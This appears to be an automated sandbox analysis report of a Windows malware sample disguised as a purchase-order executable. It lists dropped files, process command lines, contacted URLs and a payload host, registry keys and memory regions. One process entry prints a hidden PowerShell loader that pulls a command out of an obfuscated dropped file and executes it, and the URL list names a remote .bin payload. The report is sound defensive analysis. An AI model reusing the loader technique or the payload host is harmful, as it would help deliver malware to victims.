Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
PO Tournefortian2453525525235235623425523235.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\Sammentrykket.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\Sammentrykket.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Heptandrous.Arr
|
ASCII text, with very long lines (51991), with no line terminators
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Sammentrykket.ex_cdfd49ac3b26af801454be8ec917eccd673abd_e2f5391c_b8644a7e-ca96-4b2b-b9fa-9dcfc50dcc2a\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F81.tmp.dmp
|
Mini DuMP crash report, 14 streams, Fri Jul 26 21:56:40 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER302E.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER304E.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ig332v4d.ytz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_siybcszv.ei5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Biteless96.Arb16
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Deracinated215.ban
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Frankincensed.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Laminas\decasualized.nie
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Laminas\satsbilleder.min
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Laminas\sharins.dri
|
TTComp archive data, binary, 4K dictionary
|
dropped
|
||
|
C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Laminas\tepottes.non
|
data
|
dropped
|
There are 8 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe
|
"C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Typograferer=Get-Content 'C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Heptandrous.Arr';$Anskueliggjordes=$Typograferer.SubString(51945,3);.$Anskueliggjordes($Typograferer)"
|
|
|
|
C:\Users\user\AppData\Local\Temp\Sammentrykket.exe
|
"C:\Users\user\AppData\Local\Temp\Sammentrykket.exe"
|
|
|
|
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
|
"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 1896
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://villa-ventura.com/FPkXcnPDrjTal168.bin
|
185.90.59.130
|
||
|
http://pesterbdd.com/images/Pester.png4
|
unknown
|
||
|
https://github.com/Pester/Pester4
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://villa-ventura.com/
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
|
unknown
|
||
|
http://www.quovadis.bm0
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
|
unknown
|
||
|
https://ocsp.quovadisoffshore.com0
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.gopher.ftp://ftp.
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html4
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://villa-ventura.com/FPkXcnPDrjTal168.binwt?
|
unknown
|
There are 13 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
villa-ventura.com
|
185.90.59.130
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
185.90.59.130
|
villa-ventura.com
|
Portugal
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
\REGISTRY\A\{b30ed11d-829e-f800-0143-efae422928e1}\Root\InventoryApplicationFile\sammentrykket.ex|c4ce3ffbe04115b3
|
ProgramId
|
||
|
\REGISTRY\A\{b30ed11d-829e-f800-0143-efae422928e1}\Root\InventoryApplicationFile\sammentrykket.ex|c4ce3ffbe04115b3
|
FileId
|
||
|
\REGISTRY\A\{b30ed11d-829e-f800-0143-efae422928e1}\Root\InventoryApplicationFile\sammentrykket.ex|c4ce3ffbe04115b3
|
LowerCaseLongPath
|
||
|
\REGISTRY\A\{b30ed11d-829e-f800-0143-efae422928e1}\Root\InventoryApplicationFile\sammentrykket.ex|c4ce3ffbe04115b3
|
LongPathHash
|
||
|
\REGISTRY\A\{b30ed11d-829e-f800-0143-efae422928e1}\Root\InventoryApplicationFile\sammentrykket.ex|c4ce3ffbe04115b3
|
Name
|
||
|
\REGISTRY\A\{b30ed11d-829e-f800-0143-efae422928e1}\Root\InventoryApplicationFile\sammentrykket.ex|c4ce3ffbe04115b3
|
OriginalFileName
|
||
|
\REGISTRY\A\{b30ed11d-829e-f800-0143-efae422928e1}\Root\InventoryApplicationFile\sammentrykket.ex|c4ce3ffbe04115b3
|
Publisher
|
||
|
\REGISTRY\A\{b30ed11d-829e-f800-0143-efae422928e1}\Root\InventoryApplicationFile\sammentrykket.ex|c4ce3ffbe04115b3
|
Version
|
||
|
\REGISTRY\A\{b30ed11d-829e-f800-0143-efae422928e1}\Root\InventoryApplicationFile\sammentrykket.ex|c4ce3ffbe04115b3
|
BinFileVersion
|
||
|
\REGISTRY\A\{b30ed11d-829e-f800-0143-efae422928e1}\Root\InventoryApplicationFile\sammentrykket.ex|c4ce3ffbe04115b3
|
BinaryType
|
||
|
\REGISTRY\A\{b30ed11d-829e-f800-0143-efae422928e1}\Root\InventoryApplicationFile\sammentrykket.ex|c4ce3ffbe04115b3
|
ProductName
|
||
|
\REGISTRY\A\{b30ed11d-829e-f800-0143-efae422928e1}\Root\InventoryApplicationFile\sammentrykket.ex|c4ce3ffbe04115b3
|
ProductVersion
|
||
|
\REGISTRY\A\{b30ed11d-829e-f800-0143-efae422928e1}\Root\InventoryApplicationFile\sammentrykket.ex|c4ce3ffbe04115b3
|
LinkDate
|
||
|
\REGISTRY\A\{b30ed11d-829e-f800-0143-efae422928e1}\Root\InventoryApplicationFile\sammentrykket.ex|c4ce3ffbe04115b3
|
BinProductVersion
|
||
|
\REGISTRY\A\{b30ed11d-829e-f800-0143-efae422928e1}\Root\InventoryApplicationFile\sammentrykket.ex|c4ce3ffbe04115b3
|
AppxPackageFullName
|
||
|
\REGISTRY\A\{b30ed11d-829e-f800-0143-efae422928e1}\Root\InventoryApplicationFile\sammentrykket.ex|c4ce3ffbe04115b3
|
AppxPackageRelativeId
|
||
|
\REGISTRY\A\{b30ed11d-829e-f800-0143-efae422928e1}\Root\InventoryApplicationFile\sammentrykket.ex|c4ce3ffbe04115b3
|
Size
|
||
|
\REGISTRY\A\{b30ed11d-829e-f800-0143-efae422928e1}\Root\InventoryApplicationFile\sammentrykket.ex|c4ce3ffbe04115b3
|
Language
|
||
|
\REGISTRY\A\{b30ed11d-829e-f800-0143-efae422928e1}\Root\InventoryApplicationFile\sammentrykket.ex|c4ce3ffbe04115b3
|
Usn
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property
|
0018800E72D32676
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
DeviceTicket
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
DeviceId
|
There are 14 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
22040000
|
unclassified section
|
page execute and read and write
|
|
|
|
50C0000
|
unkown
|
page execute and read and write
|
|
|
|
360D000
|
remote allocation
|
page execute and read and write
|
|
|
|
AF9D000
|
direct allocation
|
page execute and read and write
|
|
|
|
2393000
|
unkown
|
page read and write
|
||
|
597F000
|
unkown
|
page execute and read and write
|
||
|
4B00000
|
heap
|
page read and write
|
||
|
8AFE000
|
stack
|
page read and write
|
||
|
50B0000
|
heap
|
page read and write
|
||
|
32B0000
|
trusted library allocation
|
page read and write
|
||
|
2409000
|
unkown
|
page read and write
|
||
|
7FE0000
|
trusted library allocation
|
page read and write
|
||
|
A60000
|
heap
|
page read and write
|
||
|
48C7000
|
heap
|
page read and write
|
||
|
5848000
|
trusted library allocation
|
page read and write
|
||
|
784E000
|
heap
|
page read and write
|
||
|
8FE0000
|
direct allocation
|
page execute and read and write
|
||
|
4C50000
|
heap
|
page read and write
|
||
|
7270000
|
direct allocation
|
page read and write
|
||
|
7C8000
|
unkown
|
page readonly
|
||
|
23BD000
|
unkown
|
page read and write
|
||
|
23CFF000
|
unclassified section
|
page execute and read and write
|
||
|
8A50000
|
heap
|
page read and write
|
||
|
71A0000
|
direct allocation
|
page read and write
|
||
|
48C7000
|
heap
|
page read and write
|
||
|
23CA000
|
unkown
|
page read and write
|
||
|
9B0000
|
unkown
|
page read and write
|
||
|
2431000
|
unkown
|
page read and write
|
||
|
493A000
|
heap
|
page read and write
|
||
|
7841000
|
heap
|
page read and write
|
||
|
7C2000
|
unkown
|
page read and write
|
||
|
4AF0000
|
direct allocation
|
page read and write
|
||
|
4C30000
|
direct allocation
|
page read and write
|
||
|
7FF0000
|
trusted library allocation
|
page read and write
|
||
|
300E000
|
stack
|
page read and write
|
||
|
23ED000
|
unkown
|
page read and write
|
||
|
240F000
|
unkown
|
page read and write
|
||
|
20210000
|
heap
|
page read and write
|
||
|
32C9000
|
trusted library allocation
|
page read and write
|
||
|
2C6F000
|
stack
|
page read and write
|
||
|
20A1D000
|
direct allocation
|
page execute and read and write
|
||
|
A20000
|
unkown
|
page read and write
|
||
|
492E000
|
heap
|
page read and write
|
||
|
3CB0000
|
unkown
|
page read and write
|
||
|
493A000
|
heap
|
page read and write
|
||
|
7260000
|
direct allocation
|
page read and write
|
||
|
7210000
|
direct allocation
|
page read and write
|
||
|
7A0E000
|
stack
|
page read and write
|
||
|
8C0000
|
unkown
|
page readonly
|
||
|
2B6F000
|
stack
|
page read and write
|
||
|
1E0000
|
heap
|
page read and write
|
||
|
3CC0000
|
unkown
|
page execute and read and write
|
||
|
2F2E000
|
stack
|
page read and write
|
||
|
4939000
|
heap
|
page read and write
|
||
|
A70000
|
unkown
|
page read and write
|
||
|
782000
|
unkown
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
8CA000
|
heap
|
page read and write
|
||
|
7C5000
|
unkown
|
page readonly
|
||
|
4AE0000
|
direct allocation
|
page read and write
|
||
|
AE0000
|
heap
|
page read and write
|
||
|
205A0000
|
heap
|
page read and write
|
||
|
33E0000
|
trusted library allocation
|
page read and write
|
||
|
4830000
|
direct allocation
|
page read and write
|
||
|
50A0000
|
heap
|
page execute and read and write
|
||
|
637F000
|
unkown
|
page execute and read and write
|
||
|
240F000
|
unkown
|
page read and write
|
||
|
2460000
|
heap
|
page read and write
|
||
|
23C4000
|
unkown
|
page read and write
|
||
|
A30000
|
unkown
|
page read and write
|
||
|
48DE000
|
heap
|
page read and write
|
||
|
7910000
|
heap
|
page execute and read and write
|
||
|
33A0000
|
unkown
|
page read and write
|
||
|
8D70000
|
trusted library allocation
|
page read and write
|
||
|
50C1000
|
trusted library allocation
|
page read and write
|
||
|
31EF000
|
heap
|
page read and write
|
||
|
570000
|
unkown
|
page readonly
|
||
|
2447000
|
unkown
|
page read and write
|
||
|
2443000
|
unkown
|
page read and write
|
||
|
2624000
|
heap
|
page read and write
|
||
|
492E000
|
heap
|
page read and write
|
||
|
4A1F000
|
stack
|
page read and write
|
||
|
4890000
|
heap
|
page read and write
|
||
|
503E000
|
stack
|
page read and write
|
||
|
764E000
|
stack
|
page read and write
|
||
|
8BA9000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
8C27000
|
heap
|
page read and write
|
||
|
48E2000
|
heap
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
3BA0000
|
unkown
|
page read and write
|
||
|
20C40000
|
unclassified section
|
page execute and read and write
|
||
|
A30000
|
unkown
|
page read and write
|
||
|
2418000
|
unkown
|
page read and write
|
||
|
23ED000
|
unkown
|
page read and write
|
||
|
5FB000
|
heap
|
page read and write
|
||
|
2386000
|
unkown
|
page read and write
|
||
|
2363000
|
heap
|
page read and write
|
||
|
8F9C000
|
stack
|
page read and write
|
||
|
2620000
|
heap
|
page read and write
|
||
|
7280000
|
direct allocation
|
page read and write
|
||
|
2F6E000
|
stack
|
page read and write
|
||
|
30B0000
|
unkown
|
page read and write
|
||
|
70280000
|
unkown
|
page readonly
|
||
|
242C000
|
unkown
|
page read and write
|
||
|
3110000
|
heap
|
page read and write
|
||
|
8FB0000
|
trusted library allocation
|
page read and write
|
||
|
2354000
|
heap
|
page read and write
|
||
|
666000
|
heap
|
page read and write
|
||
|
48C0000
|
heap
|
page read and write
|
||
|
2C5F000
|
stack
|
page read and write
|
||
|
13A000
|
stack
|
page read and write
|
||
|
77C0000
|
heap
|
page read and write
|
||
|
7C8000
|
unkown
|
page readonly
|
||
|
4890000
|
heap
|
page read and write
|
||
|
7829000
|
heap
|
page read and write
|
||
|
4891000
|
heap
|
page read and write
|
||
|
2407000
|
unkown
|
page read and write
|
||
|
7230000
|
direct allocation
|
page read and write
|
||
|
321D000
|
heap
|
page read and write
|
||
|
22E0000
|
unkown
|
page read and write
|
||
|
296F000
|
stack
|
page read and write
|
||
|
3212000
|
heap
|
page read and write
|
||
|
2B8C000
|
stack
|
page read and write
|
||
|
32E0000
|
trusted library allocation
|
page read and write
|
||
|
33C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
612A000
|
trusted library allocation
|
page read and write
|
||
|
1FB70000
|
direct allocation
|
page read and write
|
||
|
472E000
|
stack
|
page read and write
|
||
|
4A9E000
|
stack
|
page read and write
|
||
|
8F0B000
|
stack
|
page read and write
|
||
|
48E2000
|
heap
|
page read and write
|
||
|
3180000
|
heap
|
page read and write
|
||
|
2059F000
|
stack
|
page read and write
|
||
|
33A8000
|
trusted library allocation
|
page read and write
|
||
|
60E9000
|
trusted library allocation
|
page read and write
|
||
|
4750000
|
heap
|
page read and write
|
||
|
8B40000
|
trusted library allocation
|
page execute and read and write
|
||
|
F0000
|
direct allocation
|
page read and write
|
||
|
7A60000
|
trusted library allocation
|
page read and write
|
||
|
649000
|
unkown
|
page execute read
|
||
|
48E2000
|
heap
|
page read and write
|
||
|
2396000
|
unkown
|
page read and write
|
||
|
48D9000
|
heap
|
page read and write
|
||
|
30000
|
heap
|
page read and write
|
||
|
200EE000
|
stack
|
page read and write
|
||
|
626000
|
unkown
|
page execute read
|
||
|
72C0000
|
direct allocation
|
page read and write
|
||
|
48D9000
|
heap
|
page read and write
|
||
|
AE5000
|
heap
|
page read and write
|
||
|
48E2000
|
heap
|
page read and write
|
||
|
2463000
|
heap
|
page read and write
|
||
|
7420000
|
heap
|
page read and write
|
||
|
50A5000
|
heap
|
page execute and read and write
|
||
|
31B0000
|
unkown
|
page readonly
|
||
|
3290000
|
trusted library section
|
page read and write
|
||
|
9B9D000
|
direct allocation
|
page execute and read and write
|
||
|
5D0000
|
heap
|
page read and write
|
||
|
2468000
|
heap
|
page read and write
|
||
|
6B0000
|
unkown
|
page readonly
|
||
|
23C1000
|
unkown
|
page read and write
|
||
|
48C7000
|
heap
|
page read and write
|
||
|
880000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page read and write
|
||
|
48A7000
|
heap
|
page read and write
|
||
|
A59D000
|
direct allocation
|
page execute and read and write
|
||
|
7220000
|
direct allocation
|
page read and write
|
||
|
23F2000
|
unkown
|
page read and write
|
||
|
1FB40000
|
direct allocation
|
page read and write
|
||
|
32A0000
|
trusted library allocation
|
page read and write
|
||
|
493A000
|
heap
|
page read and write
|
||
|
22B0000
|
unkown
|
page read and write
|
||
|
685000
|
heap
|
page read and write
|
||
|
8C2A000
|
heap
|
page read and write
|
||
|
23B5000
|
unkown
|
page read and write
|
||
|
8CD000
|
heap
|
page read and write
|
||
|
2422000
|
unkown
|
page read and write
|
||
|
2006D000
|
stack
|
page read and write
|
||
|
71B0000
|
direct allocation
|
page read and write
|
||
|
23DA000
|
unkown
|
page read and write
|
||
|
238A000
|
unkown
|
page read and write
|
||
|
22E0000
|
unkown
|
page read and write
|
||
|
23FE000
|
unkown
|
page read and write
|
||
|
2386000
|
unkown
|
page read and write
|
||
|
7FC0000
|
trusted library allocation
|
page read and write
|
||
|
243C000
|
unkown
|
page read and write
|
||
|
13A000
|
stack
|
page read and write
|
||
|
304E000
|
stack
|
page read and write
|
||
|
23AF000
|
unkown
|
page read and write
|
||
|
2710000
|
heap
|
page read and write
|
||
|
286F000
|
stack
|
page read and write
|
||
|
4755000
|
heap
|
page read and write
|
||
|
2FAD000
|
stack
|
page read and write
|
||
|
551000
|
unkown
|
page readonly
|
||
|
3CB0000
|
unkown
|
page read and write
|
||
|
239C000
|
unkown
|
page read and write
|
||
|
7FBF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
23CD000
|
unkown
|
page read and write
|
||
|
20290000
|
remote allocation
|
page read and write
|
||
|
32E2000
|
trusted library allocation
|
page read and write
|
||
|
8D80000
|
trusted library allocation
|
page read and write
|
||
|
31AC000
|
heap
|
page read and write
|
||
|
690000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
8FF0000
|
direct allocation
|
page execute and read and write
|
||
|
228FF000
|
unclassified section
|
page execute and read and write
|
||
|
4C20000
|
direct allocation
|
page read and write
|
||
|
4868000
|
heap
|
page read and write
|
||
|
76C6000
|
heap
|
page read and write
|
||
|
7F60000
|
trusted library allocation
|
page read and write
|
||
|
239A000
|
unkown
|
page read and write
|
||
|
180000
|
unkown
|
page read and write
|
||
|
60C9000
|
trusted library allocation
|
page read and write
|
||
|
32DA000
|
trusted library allocation
|
page execute and read and write
|
||
|
AE5000
|
heap
|
page read and write
|
||
|
48E2000
|
heap
|
page read and write
|
||
|
7900000
|
trusted library allocation
|
page read and write
|
||
|
2431000
|
unkown
|
page read and write
|
||
|
2350000
|
heap
|
page read and write
|
||
|
72A0000
|
direct allocation
|
page read and write
|
||
|
2002D000
|
stack
|
page read and write
|
||
|
A70000
|
unkown
|
page read and write
|
||
|
1F0000
|
unkown
|
page readonly
|
||
|
AE0000
|
heap
|
page read and write
|
||
|
48D2000
|
heap
|
page read and write
|
||
|
276F000
|
stack
|
page read and write
|
||
|
A60000
|
heap
|
page read and write
|
||
|
3265000
|
heap
|
page read and write
|
||
|
3205000
|
heap
|
page read and write
|
||
|
3AA6000
|
unkown
|
page read and write
|
||
|
7F80000
|
trusted library allocation
|
page read and write
|
||
|
2360000
|
heap
|
page read and write
|
||
|
7FD0000
|
trusted library allocation
|
page read and write
|
||
|
23E0000
|
unkown
|
page read and write
|
||
|
286F000
|
stack
|
page read and write
|
||
|
4939000
|
heap
|
page read and write
|
||
|
5B8000
|
heap
|
page read and write
|
||
|
48C7000
|
heap
|
page read and write
|
||
|
4FAE000
|
stack
|
page read and write
|
||
|
245E000
|
unkown
|
page read and write
|
||
|
48A7000
|
heap
|
page read and write
|
||
|
E1E000
|
stack
|
page read and write
|
||
|
48DA000
|
heap
|
page read and write
|
||
|
2030F000
|
stack
|
page read and write
|
||
|
5B8000
|
heap
|
page read and write
|
||
|
72B0000
|
direct allocation
|
page read and write
|
||
|
8D0000
|
unkown
|
page read and write
|
||
|
2294000
|
unkown
|
page read and write
|
||
|
78C0000
|
heap
|
page read and write
|
||
|
23E0000
|
unkown
|
page read and write
|
||
|
2350000
|
heap
|
page read and write
|
||
|
AEE000
|
heap
|
page read and write
|
||
|
4939000
|
heap
|
page read and write
|
||
|
20290000
|
remote allocation
|
page read and write
|
||
|
2045C000
|
stack
|
page read and write
|
||
|
560000
|
unkown
|
page read and write
|
||
|
20BC0000
|
direct allocation
|
page execute and read and write
|
||
|
A40000
|
unkown
|
page read and write
|
||
|
208F0000
|
direct allocation
|
page execute and read and write
|
||
|
23BF000
|
unkown
|
page read and write
|
||
|
23B5000
|
unkown
|
page read and write
|
||
|
AEE000
|
heap
|
page read and write
|
||
|
30B0000
|
unkown
|
page read and write
|
||
|
1F0000
|
unkown
|
page readonly
|
||
|
2440000
|
unkown
|
page read and write
|
||
|
2470000
|
unkown
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
30000
|
heap
|
page read and write
|
||
|
6A6000
|
heap
|
page read and write
|
||
|
2360000
|
heap
|
page read and write
|
||
|
8B92000
|
heap
|
page read and write
|
||
|
1FB20000
|
direct allocation
|
page read and write
|
||
|
D1E000
|
stack
|
page read and write
|
||
|
33A0000
|
unkown
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
492E000
|
heap
|
page read and write
|
||
|
3188000
|
heap
|
page read and write
|
||
|
2B20000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
7F70000
|
trusted library allocation
|
page read and write
|
||
|
232FF000
|
unclassified section
|
page execute and read and write
|
||
|
1FFEF000
|
stack
|
page read and write
|
||
|
6288000
|
trusted library allocation
|
page read and write
|
||
|
713E000
|
stack
|
page read and write
|
||
|
32D0000
|
trusted library allocation
|
page read and write
|
||
|
4FB0000
|
heap
|
page execute and read and write
|
||
|
23AB000
|
unkown
|
page read and write
|
||
|
7888000
|
heap
|
page read and write
|
||
|
8D0000
|
unkown
|
page read and write
|
||
|
8B86000
|
heap
|
page read and write
|
||
|
72D0000
|
direct allocation
|
page read and write
|
||
|
B9F000
|
stack
|
page read and write
|
||
|
2427000
|
unkown
|
page read and write
|
||
|
70FE000
|
stack
|
page read and write
|
||
|
786000
|
unkown
|
page read and write
|
||
|
266D000
|
stack
|
page read and write
|
||
|
48A7000
|
heap
|
page read and write
|
||
|
48C0000
|
heap
|
page read and write
|
||
|
4939000
|
heap
|
page read and write
|
||
|
60000
|
direct allocation
|
page read and write
|
||
|
237E000
|
unkown
|
page read and write
|
||
|
805000
|
unkown
|
page readonly
|
||
|
786B000
|
heap
|
page read and write
|
||
|
492E000
|
heap
|
page read and write
|
||
|
5E8000
|
unkown
|
page execute read
|
||
|
48DE000
|
heap
|
page read and write
|
||
|
492E000
|
heap
|
page read and write
|
||
|
804B000
|
stack
|
page read and write
|
||
|
201BE000
|
stack
|
page read and write
|
||
|
9BE000
|
stack
|
page read and write
|
||
|
31EA000
|
heap
|
page read and write
|
||
|
20A19000
|
direct allocation
|
page execute and read and write
|
||
|
9B0000
|
unkown
|
page read and write
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
580000
|
unkown
|
page readonly
|
||
|
7831000
|
heap
|
page read and write
|
||
|
243C000
|
unkown
|
page read and write
|
||
|
570000
|
unkown
|
page readonly
|
||
|
2B5F000
|
stack
|
page read and write
|
||
|
23AB000
|
unkown
|
page read and write
|
||
|
8000000
|
trusted library allocation
|
page read and write
|
||
|
23BA000
|
unkown
|
page read and write
|
||
|
2D70000
|
heap
|
page read and write
|
||
|
4840000
|
direct allocation
|
page read and write
|
||
|
7250000
|
direct allocation
|
page read and write
|
||
|
768E000
|
stack
|
page read and write
|
||
|
2443000
|
unkown
|
page read and write
|
||
|
76C2000
|
heap
|
page read and write
|
||
|
2017E000
|
stack
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
23F6000
|
unkown
|
page read and write
|
||
|
7190000
|
direct allocation
|
page read and write
|
||
|
2413000
|
unkown
|
page read and write
|
||
|
7C5000
|
unkown
|
page readonly
|
||
|
2463000
|
heap
|
page read and write
|
||
|
23E4000
|
unkown
|
page read and write
|
||
|
7C8000
|
unkown
|
page readonly
|
||
|
48BB000
|
heap
|
page read and write
|
||
|
20000
|
unkown
|
page readonly
|
||
|
308E000
|
stack
|
page read and write
|
||
|
30AE000
|
stack
|
page read and write
|
||
|
70281000
|
unkown
|
page execute read
|
||
|
8C39000
|
heap
|
page read and write
|
||
|
B0000
|
direct allocation
|
page read and write
|
||
|
2FC6000
|
heap
|
page read and write
|
||
|
2A6F000
|
stack
|
page read and write
|
||
|
4C40000
|
direct allocation
|
page read and write
|
||
|
4939000
|
heap
|
page read and write
|
||
|
7F90000
|
trusted library allocation
|
page read and write
|
||
|
551000
|
unkown
|
page readonly
|
||
|
789000
|
unkown
|
page read and write
|
||
|
2C6F000
|
stack
|
page read and write
|
||
|
4C00000
|
direct allocation
|
page read and write
|
||
|
5EA000
|
unkown
|
page execute read
|
||
|
7200000
|
direct allocation
|
page read and write
|
||
|
32C0000
|
trusted library allocation
|
page read and write
|
||
|
149000
|
stack
|
page read and write
|
||
|
400D000
|
remote allocation
|
page execute and read and write
|
||
|
2427000
|
unkown
|
page read and write
|
||
|
B0000
|
direct allocation
|
page read and write
|
||
|
4E0000
|
unkown
|
page read and write
|
||
|
22D0000
|
unkown
|
page readonly
|
||
|
4B01000
|
heap
|
page read and write
|
||
|
8F5E000
|
stack
|
page read and write
|
||
|
7A70000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BC8000
|
stack
|
page read and write
|
||
|
2A6F000
|
stack
|
page read and write
|
||
|
78A0000
|
heap
|
page read and write
|
||
|
239A000
|
unkown
|
page read and write
|
||
|
23FB000
|
unkown
|
page read and write
|
||
|
2294000
|
unkown
|
page read and write
|
||
|
7845000
|
heap
|
page read and write
|
||
|
202CE000
|
stack
|
page read and write
|
||
|
4939000
|
heap
|
page read and write
|
||
|
23EA000
|
unkown
|
page read and write
|
||
|
7F50000
|
trusted library allocation
|
page read and write
|
||
|
7AC000
|
unkown
|
page read and write
|
||
|
20290000
|
remote allocation
|
page read and write
|
||
|
4E0000
|
unkown
|
page read and write
|
||
|
AF0000
|
unkown
|
page readonly
|
||
|
2403000
|
unkown
|
page read and write
|
||
|
2447000
|
unkown
|
page read and write
|
||
|
7240000
|
direct allocation
|
page read and write
|
||
|
20000
|
unkown
|
page readonly
|
||
|
4754000
|
heap
|
page read and write
|
||
|
2418000
|
unkown
|
page read and write
|
||
|
48DA000
|
heap
|
page read and write
|
||
|
B99D000
|
direct allocation
|
page execute and read and write
|
||
|
89D7000
|
stack
|
page read and write
|
||
|
2458000
|
unkown
|
page read and write
|
||
|
87E000
|
stack
|
page read and write
|
||
|
798E000
|
stack
|
page read and write
|
||
|
3300000
|
trusted library allocation
|
page read and write
|
||
|
69E000
|
heap
|
page read and write
|
||
|
23CA000
|
unkown
|
page read and write
|
||
|
5EC000
|
unkown
|
page execute read
|
||
|
4939000
|
heap
|
page read and write
|
||
|
32B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
48DA000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
E80000
|
unkown
|
page readonly
|
||
|
23DA000
|
unkown
|
page read and write
|
||
|
48C0000
|
heap
|
page read and write
|
||
|
1FB30000
|
direct allocation
|
page read and write
|
||
|
8B70000
|
heap
|
page read and write
|
||
|
7856000
|
heap
|
page read and write
|
||
|
1FFAE000
|
stack
|
page read and write
|
||
|
685000
|
heap
|
page read and write
|
||
|
492E000
|
heap
|
page read and write
|
||
|
206C3000
|
heap
|
page read and write
|
||
|
4ADF000
|
stack
|
page read and write
|
||
|
805000
|
unkown
|
page readonly
